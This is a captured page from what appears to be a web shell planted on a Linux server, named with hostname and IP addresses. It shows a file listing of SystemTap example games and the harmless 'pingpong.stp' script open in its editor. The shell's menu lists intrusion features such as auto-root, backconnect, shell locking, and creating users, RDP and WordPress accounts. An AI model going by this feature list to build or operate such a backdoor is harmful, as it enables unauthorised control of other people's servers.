Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.156
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
systemtap /
examples /
stapgames /
[ HOME SHELL ]
Name
Size
Permission
Action
tapset
[ DIR ]
drwxr-xr-x
2048.meta
250
B
-rw-r--r--
2048.stp
4.87
KB
-rw-r--r--
block.meta
251
B
-rw-r--r--
block.stp
2.34
KB
-rwxr-xr-x
eater.meta
187
B
-rw-r--r--
eater.stp
3.22
KB
-rwxr-xr-x
lifegame.meta
216
B
-rw-r--r--
lifegame.stp
1.09
KB
-rwxr-xr-x
pingpong.meta
338
B
-rw-r--r--
pingpong.stp
768
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pingpong.stp
#!/usr/bin/stap # Ping pong ball in tty window # Run in a xterm and resize window # Copyright (C) 2011 Masami Hiramatsu <masami.hiramatsu@gmail.com> # # This file is free software and is distributed under the terms of the GNU # General Public License (GPL); either version 2, or (at your option) any # later version. global Row, Col global dr = 1, dc = 1 probe begin { Row = game_tty_ws_row()/2; Col = game_tty_ws_col()/2 } probe timer.ms(50) { Row += dr; Col += dc if (Row >= game_tty_ws_row()) { dr = -dr; Row = game_tty_ws_row() } else if (Row <= 1) { dr = -dr; Row = 1 } if (Col >= game_tty_ws_col()) { dc = -dc; Col = game_tty_ws_col() } else if (Col <= 1) { dc = -dc; Col = 1 } ansi_clear_screen() ansi_cursor_move(Col, Row) print("@") }
Close